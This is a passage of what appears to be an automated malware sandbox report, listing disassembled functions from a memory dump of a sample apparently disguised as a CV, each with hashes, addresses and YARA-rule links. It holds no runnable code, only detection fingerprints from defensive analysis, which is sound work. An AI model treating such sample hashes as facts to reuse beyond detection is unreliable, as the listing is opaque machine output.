                                                                                                  • Opcode Fuzzy Hash: b32b66a64eb686ce2550eafeac90f07ee095e5a4bc4a895fda5be1685579c209
                                                                                                  • Instruction Fuzzy Hash: 95F08C31101700DFDB356A14ED52B5277E0AF407B0F114659B157069E1CB6CBC46FA44
                                                                                                  Function 00FE630E Relevance: .0, Instructions: 27COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e34d8b1e9544b35a6832514a92fbb8c39f367d50107a00a5c84dc41f29603271
                                                                                                  • Instruction ID: e38cea949c744505f5c8a56696ca3c15bc69a10af6dd3354af1f47d7187b0ccf
                                                                                                  • Opcode Fuzzy Hash: e34d8b1e9544b35a6832514a92fbb8c39f367d50107a00a5c84dc41f29603271
                                                                                                  • Instruction Fuzzy Hash: 94E0D833600114BFCB2197558D05F5BBABDDB54BA0F050065BA00E7191D534EE00E290
                                                                                                  Function 00F42500 Relevance: .0, Instructions: 23COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 474b59cf91cb151479c195d9957a6f99dc839f882a4b9e352bac17641e774cdf
                                                                                                  • Instruction ID: b5ee7d20f8aa4d2e0af7a1386df46d50eac85cf8cac56a9cae315eb84db5c5d3
                                                                                                  • Opcode Fuzzy Hash: 474b59cf91cb151479c195d9957a6f99dc839f882a4b9e352bac17641e774cdf
                                                                                                  • Instruction Fuzzy Hash: 7CE09232100544ABC321BB19DC02F9B7BA9EF90361F004124F556571A2CA39BA10EBD4
                                                                                                  Function 00F7C958 Relevance: .0, Instructions: 22COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c72ac461ecf9778c204ef95d385df9894fc12bf01f1d99566e3855b2dfeb267f
                                                                                                  • Instruction ID: 117a8382c3c91644c72072a190658711b17010d86f504b3829ed84d72ee0f141
                                                                                                  • Opcode Fuzzy Hash: c72ac461ecf9778c204ef95d385df9894fc12bf01f1d99566e3855b2dfeb267f
                                                                                                  • Instruction Fuzzy Hash: 1FD02B334560206ACBB5A1267C10FA33EBC9B46760F014476F60CD2010D918CC41F2C4
                                                                                                  Function 00F381EB Relevance: .0, Instructions: 21COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                                  • Instruction ID: 69e9f90033f35eb4e42e3f981a57045a1cd559c24dad6fa4f4f1bc0cceef2be8
                                                                                                  • Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                                  • Instruction Fuzzy Hash: 49E08C32440614EFDB317A24DC01F927AA1EF40BB0F20056AF086060A18BBCAC82FB48
                                                                                                  Function 00F38C3D Relevance: .0, Instructions: 21COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5663e0f35f59b4786cff651edfab4e0250af7e9ff0298b75044c79922af63661
                                                                                                  • Instruction ID: 739ea19cc9432605df0cbcc1fd89137b480c64adacff98ff1745501e7cca4c15
                                                                                                  • Opcode Fuzzy Hash: 5663e0f35f59b4786cff651edfab4e0250af7e9ff0298b75044c79922af63661
                                                                                                  • Instruction Fuzzy Hash: A8E08631401710EEDB312F15DD01F5276E1AF40BB1F205469B142154B1CB7CEC85FA55
                                                                                                  Function 00F789B0 Relevance: .0, Instructions: 20COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                  • Instruction ID: 2b1fa1d42a299caa9f6b3aaa423317754f6c80c97fc09383fc514209aa065136
                                                                                                  • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                  • Instruction Fuzzy Hash: 28E0DF33150A0487C328DE18C41677277A4EB44B20B04823AA61747380C930E804D69A
                                                                                                  Function 00F96912 Relevance: .0, Instructions: 17COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9eeef1791f682d1806daff088d782c605668e39cbad21fc7d49dd3969ced6bd8
                                                                                                  • Instruction ID: 5cba84e49fba8578c6e105dfef11d82e7637d23fca8be6789953880a6c04c247
                                                                                                  • Opcode Fuzzy Hash: 9eeef1791f682d1806daff088d782c605668e39cbad21fc7d49dd3969ced6bd8
                                                                                                  • Instruction Fuzzy Hash: 01D05E32501A40AFC7325F0BEE00D13BBF9FBC4B617050A2EA54583920C670EC06DBA0
                                                                                                  Function 00F7E4BC Relevance: .0, Instructions: 16COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                                  • Instruction ID: bfae83f92df120deb212aae5e716c200db816e04cc6e7adc01811bb269a4be2b
                                                                                                  • Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                                  • Instruction Fuzzy Hash: 92D0A932208610ABC732AA2CFC00FC333E8AB88B62F120459B208C7151C3A8EC81DA80
                                                                                                  Function 00FBE588 Relevance: .0, Instructions: 16COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                                  • Instruction ID: 9c432e88d6e56af12ae04dffd3d203501d76b21c2a6fc71748f951632741f52c
                                                                                                  • Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                                  • Instruction Fuzzy Hash: 63E0EC35A506849FCB22DF5ACA41F9AB7B5BB84B50F190454B5089B661C628ED00DB40
                                                                                                  Function 00F3A093 Relevance: .0, Instructions: 15COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                                  • Instruction ID: 3f58d3be91d2d1d86757af52a0a49eedb0ea4862dd57ebf11a9bf2d5d2a81250
                                                                                                  • Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                                  • Instruction Fuzzy Hash: 85D01273606071A7CB3D6656AD14F6779159B81BB1F1A016D7D0B93900C514CC42F6E1
                                                                                                  Function 00F7A750 Relevance: .0, Instructions: 14COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                                  • Instruction ID: e07583f08deeb8d3d09241dad029f32fe600131368be1c03b97659ce65dbc26a
                                                                                                  • Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                                  • Instruction Fuzzy Hash: E4D012371D054DBBCB119F65DC02F957BA9E794BA0F044020BA04875A1CA3AE950D984
                                                                                                  Function 00F7C944 Relevance: .0, Instructions: 14COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 51f9009ea6ea77eac28772b2c33c749235058847de315d59bab35fbf77fd7689
                                                                                                  • Instruction ID: 13387d925b735a0ee49d4e9af51dd14b2ba03e56e371185aaf5bfb67235cc9fb
                                                                                                  • Opcode Fuzzy Hash: 51f9009ea6ea77eac28772b2c33c749235058847de315d59bab35fbf77fd7689
                                                                                                  • Instruction Fuzzy Hash: 00D0A730901802EBDF669F01DA00FAD7778EB58780B00005CF60151451D729DD01FE90
                                                                                                  Function 00F501C0 Relevance: .0, Instructions: 12COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                                  • Instruction ID: 9c8e2795e71bc67a45031f144508a6ce0bbcf30580c97b85487525f1e3693c70
                                                                                                  • Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                                  • Instruction Fuzzy Hash: 32D0C936352D80CFC61ACF0CC894B0573A4BB44F41F850490E801CB722D66CED44CA00
                                                                                                  Function 00F7C620 Relevance: .0, Instructions: 12COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                                  • Instruction ID: 60e88eaffac852bd601c6dff512f4ab6d53588e929d915ef376c9cf60335a093
                                                                                                  • Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                                  • Instruction Fuzzy Hash: F4C08C33290648BFC722EF98CD02F027BA9EB98B40F000021F7048B671C635FD20EA88
                                                                                                  Function 00F60230 Relevance: .0, Instructions: 11COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                  • Instruction ID: 512e8e026ae359c8af2d36f224e51848e9c46b4e79a7f3f8304c3b3706e7d271
                                                                                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                  • Instruction Fuzzy Hash: B9D0123610024CEFCB02DF40C854D5A772AFFC8710F108019FD19076118A35ED62DA50
                                                                                                  Function 00F40670 Relevance: .0, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                                  • Instruction ID: 2a5037cc6257e4b153cb220493d8c34df206307a0c19412cf6f7ac5280aa5107
                                                                                                  • Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                                  • Instruction Fuzzy Hash: 59C04C357419408FDF15CB19C684F0977E4B764755F1504D0ED05DB721D628ED04DA10
                                                                                                  Function 00FF6A80 Relevance: .0, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                                  • Instruction ID: 0e2a2054ecc089844b20f909399811fbef0f6509e30e802954d6df00424ced27
                                                                                                  • Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                                  • Instruction Fuzzy Hash: 42C02B1F0152C149CD13CF3003123E0BF60CB025D0F1C04C1C0C15F123C0180503D625
                                                                                                  Function 0101492D Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d6a7e2c2604d17a6bfa047b9f4fbda2068d80fac77509b42c2577b9861e14ffd
                                                                                                  • Instruction ID: dfd7f4b4779cd334dc2dd5ed8a060f470e1587862b59d8600aa5939178e614bd
                                                                                                  • Opcode Fuzzy Hash: d6a7e2c2604d17a6bfa047b9f4fbda2068d80fac77509b42c2577b9861e14ffd
                                                                                                  • Instruction Fuzzy Hash: 2BB01231213945EFC7026724CF41B1832A9BF027C0F0D04B0B60085431DA1C8810E501
                                                                                                  Function 00F84260 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0a10aa23a146834c08cc05b3c06bfca609ae4a036c6edefc71b9226544336a52
                                                                                                  • Instruction ID: 273a3a1c345eb2daf42ab15c32196ad2208ffacdec4b6423de7745fec065145d
                                                                                                  • Opcode Fuzzy Hash: 0a10aa23a146834c08cc05b3c06bfca609ae4a036c6edefc71b9226544336a52
                                                                                                  • Instruction Fuzzy Hash: 3D90023161540012AA4071584984546400597E2341B91C465E0418554DCE2589577371
                                                                                                  Function 00F84570 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8946de45db987861c88b885799c126dab3f1adf95bd2ad82542c482bba25a7f7
                                                                                                  • Instruction ID: 430752757cf7ae743c3db94dcfe4eb2c6f1bcaa985f5fd73d78b1a89907d4a20
                                                                                                  • Opcode Fuzzy Hash: 8946de45db987861c88b885799c126dab3f1adf95bd2ad82542c482bba25a7f7
                                                                                                  • Instruction Fuzzy Hash: 99900261611100425A4071584904406600597E33413D1C569A0548560DCA298856B279
                                                                                                  Function 00F829F0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4a8abd9c1b868d1750e14ac0d39c3e1b1f876d6740d6073a0ead2ad61fb31125
                                                                                                  • Instruction ID: 5c1ed02da3813bc496bdb76761402336ba5d0a5daaae6bf4c364e3ee387cc391
                                                                                                  • Opcode Fuzzy Hash: 4a8abd9c1b868d1750e14ac0d39c3e1b1f876d6740d6073a0ead2ad61fb31125
                                                                                                  • Instruction Fuzzy Hash: AC900225221000031A05A5580704507004687D7391391C475F1009550DDA3288627131
                                                                                                  Function 00F829D0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 590f8efc8f3478084b41ca10c20577130385fc22f755b7878202cb27eaff8296
                                                                                                  • Instruction ID: b675082a903f989ef32dac7eacd9e5a31a4f470e8636178a2f5a442f69b69cc9
                                                                                                  • Opcode Fuzzy Hash: 590f8efc8f3478084b41ca10c20577130385fc22f755b7878202cb27eaff8296
                                                                                                  • Instruction Fuzzy Hash: DA9002A1211140925E00A2588504B0A450587E2341B91C46AE1048560DC9368852B135
                                                                                                  Function 00F82AC0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e2f02bdcff755ae23d7d23d286fbf1be6ada30e6c7077ba86ab0751f58a672bd
                                                                                                  • Instruction ID: 1f6f3ab57c3fe0c4a743b87c448a256a861684797a749a77258cce5d1db794a3
                                                                                                  • Opcode Fuzzy Hash: e2f02bdcff755ae23d7d23d286fbf1be6ada30e6c7077ba86ab0751f58a672bd
                                                                                                  • Instruction Fuzzy Hash: AE90023161500802EA5071584514746000587D2341F91C465A0018654ECB668A5676B1
                                                                                                  Function 00F82AA0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0f64076717e872ea1c38ba0bbc923179e1f10f1daf756a00100c4d9c5e0836c0
                                                                                                  • Instruction ID: 0d7ddecfae304fbae6d8f5f52178c1c790f73143d408e3ac78199cb603a3d975
                                                                                                  • Opcode Fuzzy Hash: 0f64076717e872ea1c38ba0bbc923179e1f10f1daf756a00100c4d9c5e0836c0
                                                                                                  • Instruction Fuzzy Hash: 3290023121100802EA0461584904686000587D2341F91C465A6018655FDA7688927131
                                                                                                  Function 00F82A10 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d884e181a9fcbe28adddf2da6590de015bcc2f4f9d29dae6be0d2fdc41d930f5
                                                                                                  • Instruction ID: 85e88de2ed6bfd16c2f2d3bba2a0a1b283b81a44ea3cfe60b322189a1e22c026
                                                                                                  • Opcode Fuzzy Hash: d884e181a9fcbe28adddf2da6590de015bcc2f4f9d29dae6be0d2fdc41d930f5
                                                                                                  • Instruction Fuzzy Hash: B5900225231000021A45A558070450B044597D73913D1C469F140A590DCA3288667331
                                                                                                  Function 00F82BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8756c77e61d0c65f474072d2ade2bac846b6c03103861b7424f24771438e243f
                                                                                                  • Instruction ID: 0f689b81d5f52957d700ef218fc9aaabfaad629b9f65a745bb0fea7b97332c2f
                                                                                                  • Opcode Fuzzy Hash: 8756c77e61d0c65f474072d2ade2bac846b6c03103861b7424f24771438e243f
                                                                                                  • Instruction Fuzzy Hash: 9B90022161500402EA4071585518706001587D2341F91D465A0018554ECA6A8A5676B1
                                                                                                  Function 00F82BC0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ed159acb2f0ee9cec356b8c029a3ead9de2f9fe78f4803834eed1f45fe136d0b
                                                                                                  • Instruction ID: 10b479b179cd38954853b62ced55be468c03e92b6f17af07bb7a8e7a55eef17f
                                                                                                  • Opcode Fuzzy Hash: ed159acb2f0ee9cec356b8c029a3ead9de2f9fe78f4803834eed1f45fe136d0b
                                                                                                  • Instruction Fuzzy Hash: 0390023121100402EA0065985508646000587E2341F91D465A5018555FCA7688927131
                                                                                                  Function 00F82B80 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cae3b4c20b1d2838b05f5229e50c980128c14a9ef29f4bd1851ff2d18b8ab264
                                                                                                  • Instruction ID: 30ac8eaa47af95d5eb0956d3f48222516cdc074352d1ac626a3984437d44ff0c
                                                                                                  • Opcode Fuzzy Hash: cae3b4c20b1d2838b05f5229e50c980128c14a9ef29f4bd1851ff2d18b8ab264
                                                                                                  • Instruction Fuzzy Hash: 8390023121100842EA0061584504B46000587E2341F91C46AA0118654ECA26C8527531
                                                                                                  Function 00F82B10 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 851a9d0b09388a0b1ff9169cdf6880c5537cef7c622464686959281ab6997380
                                                                                                  • Instruction ID: 5968e73353e1095bc41378e90fb16c01d5da3472d62d1086410977f43ed0f1f4
